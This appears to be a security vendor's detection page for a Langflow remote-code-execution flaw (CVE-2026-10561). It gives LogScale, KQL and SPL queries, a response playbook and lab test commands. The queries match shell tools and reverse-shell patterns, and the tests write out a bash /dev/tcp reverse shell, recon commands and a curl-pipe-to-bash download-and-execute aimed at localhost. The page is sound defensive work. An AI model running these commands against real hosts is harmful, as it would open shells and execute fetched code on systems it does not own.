Detect Langflow PythonREPLComponent Unsandboxed Code Execution (CVE-2026-10561) in CrowdStrike LogScale
Detects exploitation of CVE-2026-10561, a critical (CVSS 9.9) remote code execution and privilege escalation vulnerability in Langflow versions prior to 1.10.1. The PythonREPLComponent executes user-supplied Python code without a sandbox, allowing any authenticated user to run arbitrary code with the privileges of the Langflow process. This detection looks for the Langflow server process (uvicorn/python running langflow) spawning unexpected child processes (shells, interpreters, reconnaissance binaries, reverse-shell patterns) and for suspicious API activity against the flow build/run endpoints that carry PythonREPLComponent payloads.
MITRE ATT&CK
- Tactic
- Execution Privilege Escalation
LogScale Detection Query
#event_simpleName=ProcessRollup2
| ParentBaseFileName=/python|uvicorn|gunicorn/i
| ParentCommandLine=/langflow|uvicorn/i
| FileName=/^(sh|bash|zsh|dash|nc|ncat|curl|wget|whoami|id|uname|powershell\.exe|cmd\.exe)$/i
| CommandLine=/(-c|\/dev\/tcp|base64|socket|subprocess|os\.system|exec\(|reverse|bash -i)/i
| table([@timestamp, ComputerName, UserName, ParentBaseFileName, ParentCommandLine, FileName, CommandLine]) CrowdStrike CQL detecting the Langflow Python parent spawning suspicious children with injected PythonREPLComponent code.
Data Sources
Required Tables
False Positives & Tuning
- Intentional subprocess-spawning custom components
- Admin debugging under the service account
- Startup helper scripts
Other platforms for CVE-2026-10561
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Langflow PythonREPL reverse shell simulation
Expected signal: Process launch: python3 parent spawning bash child with /dev/tcp reverse-shell command line.
- Test 2Langflow PythonREPL recon command execution
Expected signal: python3 process spawning sh -c invoking whoami/id/uname.
- Test 3Langflow PythonREPL download-and-execute
Expected signal: python3 parent spawning bash/curl child with piped execution command line.
References (7)
- https://github.com/langflow-ai/langflow/security/advisories/GHSA-8qpj-27x8-pwpq
- https://nvd.nist.gov/vuln/detail/CVE-2026-10561
- https://github.com/langflow-ai/langflow/pull/13700
- https://github.com/langflow-ai/langflow/commit/2754c84aad1306f463db1c3bbb3e8ffbe85da77d
- https://github.com/langflow-ai/langflow/releases/tag/v1.10.1
- https://www.ibm.com/support/pages/node/7277242
- https://github.com/advisories/GHSA-8qpj-27x8-pwpq
Response Playbook
Triage
- Confirm the Langflow version on the affected host (`pip show langflow`); versions < 1.10.1 are vulnerable to unsandboxed PythonREPLComponent execution.
- Correlate the alerting child process with the Langflow access logs to identify the authenticated user/API key that submitted the flow run or build request.
- Review the parent Langflow process command line and the spawned child command line to determine whether the execution is a known custom component or injected attacker code (reverse shell, recon, download-and-execute).
- Determine whether the spawned process achieved outbound network connectivity or wrote new executables/persistence artifacts.
Containment
- Isolate the affected Langflow host from the network to stop any active reverse shell or lateral movement.
- Revoke the API key / session token of the authenticated user that triggered the PythonREPLComponent execution and disable the account pending investigation.
- Upgrade Langflow to >= 1.10.1 (which removes unsandboxed PythonREPLComponent execution) or, as an interim measure, restrict/disable the Python REPL component and place the service behind strict network ACLs.
Evidence Collection
- Capture the full Langflow application logs, uvicorn/gunicorn access logs, and the flow JSON definitions submitted around the alert time.
- Preserve process execution telemetry (parent/child, command lines, hashes) and any files written by the spawned process.
- Snapshot the host or container filesystem and collect network connection logs for the Langflow service account.
Escalation Criteria
- !Escalate to incident response if the spawned child established an outbound/reverse connection or executed credential-access or recon commands.
- !Escalate if evidence shows privilege escalation beyond the Langflow service account or lateral movement to other hosts.
- !Escalate if the triggering account is unexpected, shared, or shows signs of compromise (impossible travel, brute force precursors).
Investigation Guide
Related Techniques
Forensic Artifacts
- >
Langflow/uvicorn access logs showing POST requests to flow build/run endpoints (e.g. /api/v1/build, /api/v1/run) around the alert time - >
Flow JSON definitions containing a PythonREPLComponent node with attacker code - >
Process execution records for children of the Langflow Python process, plus any files/persistence they created
Tuning Guidance
Enumerate legitimate custom Langflow components that intentionally spawn subprocesses and allowlist their specific command-line patterns and service-account context. Scope the detection to hosts/containers known to run Langflow to reduce noise, and tighten the suspicious-child list to the binaries never expected in your deployment.
Hunting Queries
Baseline and hunt for any shell/recon children of the Langflow server process across the fleet.
DeviceProcessEvents | where InitiatingProcessCommandLine has "langflow" | where FileName in~ ("sh","bash","nc","ncat","curl","wget","whoami","id") | summarize count() by DeviceName, FileName, ProcessCommandLine, bin(Timestamp, 1h) index=edr (parent_process=*langflow* OR parent_process=*uvicorn*) (process_name=sh OR process_name=bash OR process_name=nc OR process_name=curl OR process_name=whoami) | stats count by host, process_name, process Atomic Red Team Tests
Simulates injected PythonREPLComponent code that launches a bash reverse shell from the Langflow process context (lab only).
Command
python3 -c "import subprocess; subprocess.run(['bash','-c','bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'])" & Cleanup
pkill -f '/dev/tcp/127.0.0.1/4444' 2>/dev/null; true Expected Telemetry
Process launch: python3 parent spawning bash child with /dev/tcp reverse-shell command line.
Expected Detection
KQL/SPL/EQL rules match the python parent spawning bash with /dev/tcp pattern.
Simulates attacker running host reconnaissance via unsandboxed Python code.
Command
python3 -c "import os; os.system('whoami; id; uname -a')" Cleanup
echo 'no cleanup required' Expected Telemetry
python3 process spawning sh -c invoking whoami/id/uname.
Expected Detection
Rules match python parent spawning recon binaries via os.system.
Simulates injected code that downloads and runs a second-stage payload.
Command
python3 -c "import subprocess; subprocess.run(['bash','-c','curl -s http://127.0.0.1:8000/x.sh | bash'])" Cleanup
rm -f /tmp/x.sh 2>/dev/null; true Expected Telemetry
python3 parent spawning bash/curl child with piped execution command line.
Expected Detection
Rules match python parent spawning curl/bash with download-and-execute pattern.